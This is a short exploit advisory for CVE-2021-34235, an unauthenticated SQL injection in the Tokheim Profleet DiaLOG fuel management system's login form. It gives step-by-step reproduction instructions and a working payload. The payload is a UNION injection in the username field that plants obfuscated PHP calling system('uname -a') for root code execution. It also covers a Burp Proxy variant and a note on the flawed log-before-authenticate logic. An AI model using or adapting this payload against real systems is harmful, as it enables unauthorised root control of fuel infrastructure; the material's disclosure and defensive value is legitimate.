Tokheim Profleet DiaLOG Fuel Management System 11.005.02 SQL Injection / Code Execution

`# Exploit Title: Tokheim Profleet DiaLOG Fuel Management System 11.005.02 - SQLi (Unauthenticated)  
# Date: 02/9/2022  
# Exploit Author: golem445  
# Vendor Homepage: https://www.tsg-solutions.com  
# Tested on: Kali Linux  
# CVE: CVE-2021-34235  
# Description: Field__UserLogin parameter is vulnerable to crafted MySQL injection, resulting in remote code execution as root.  
  
==Steps to Reproduce==  
# Go to : http://dialog_host/login.php  
# Enter escaped MySQL query into the username field and submit, passwords doesn't matter. (Such as: ' /*!50000union*/ select 1,2,3,4,5,6,7,8,’data://text/plain,<?php $a=”sy”;$b=”stem”;$c=$a.$b; $c(“uname -a”);?>’ -- -)  
# This can also be accomplished via intercepting the logon submission with Burp Proxy, then entering your MySQL query into the Field_UserLogin parameter.  
  
==Notes==  
This vulnerability appears rooted in a logic flaw. Typical authentication logic flow is a user submitting their credentials, authentication success/failure occurs, followed with results being noted in a log. This application appears to work inversely, i.e. logon attempt is logged, then the users credentials are checked.  
`